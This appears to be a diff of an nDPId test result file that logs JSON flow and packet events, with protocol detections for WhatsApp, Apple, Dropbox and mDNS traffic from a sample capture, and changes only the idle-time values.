+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02415{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/D
lBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"} 
+01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"} 
+01222{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"thread_ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"thread_ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582396509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582396509,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQPEAAEARsZnAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
@@ -33,21 +33,21 @@ 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1432582402667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1432582402667,"pkt":"MzMAAAD7APS5Jrv0ht1gCRl1ADkR\/\/6AAAAAAAAAGJzDGxKYAiT\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5eQMAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADIABCF9haXJwbGF5wBIADIAB"} 00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582402667,"flow_last_seen":1432582402667,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1432582402667,"l3_proto":"ip6","src_ip":"fe80::189c:c31b:1298:224","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}} 
00862{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1432582404307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1432582404307,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFgAAP8Rdk0AAAAA\/\/\/\/\/wBEAEMBNOdaAQEGALYzLg4ABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"} -00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7440000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
-00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1432582413522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582413522,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJvAAAC8GqnYRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlW0AAAAQEICm+JXrst\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 
+00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582411561,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu4AAC8GqngRbuUOwKgCBBRnwCnUixwguGhbLIAYAUleegAAAQEICm+JVxEt\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582411561,"flow_last_seen":1432582411561,"flow_idle_time":7560000,"flow_min_l4_payload_len":309,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1432582411561,"l3_proto":"ip4","src_ip":"17.110.229.14","dst_ip":"192.168.2.4","src_port":5223,"dst_port":49193,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432582412221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":375,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":375,"pkt_l4_len":341,"thread_ts_msec":1432582412221,"pkt":"APS5Jrv0xiwDYGpkCABFAAFpJu8AAC8GqncRbuUOwKgCBBRnwCnUixwguGhbLIAYAUlb7AAAAQEICm+JWZ8t\/BtwFwMBATAEtIuqVIsa2PHNKJeXP8xTjhoqWdhKZwOmK+i+hD5yD1M8ZM2np34aAKWtz8Bb1aOnbLJLQUe09gfoXrYrjNyw4Kz3tEhKuIJxuOR\/NLSkV4SGkIhMwiudLCMa+dHjOQ4E1rq3emNZqDFKuO5luZdltedNjC1Ni5FOba+q6FF8xJzIsSuI9Rh7dvtMvFQuN0jBEi2sNdUH+3VURleCkMaERRQQs2Fub+QUSLgkRAhefAGFzZxVCC52B4evzq7Cz7lW8fuDhUSEwqmRuVuaK7KmZTAj\/JcTRaXUVChFbQXi6T9DG8GOYrQ3cgORiCgEhtpuRfeKNmM1Ic+HX03yWe2oxtSVVy4N22M9Svs5SDcjT\/U2Guvq6M+RgrH5sh4Ew0i0LSm0dEuk7kx1gbhQeJQH"} 
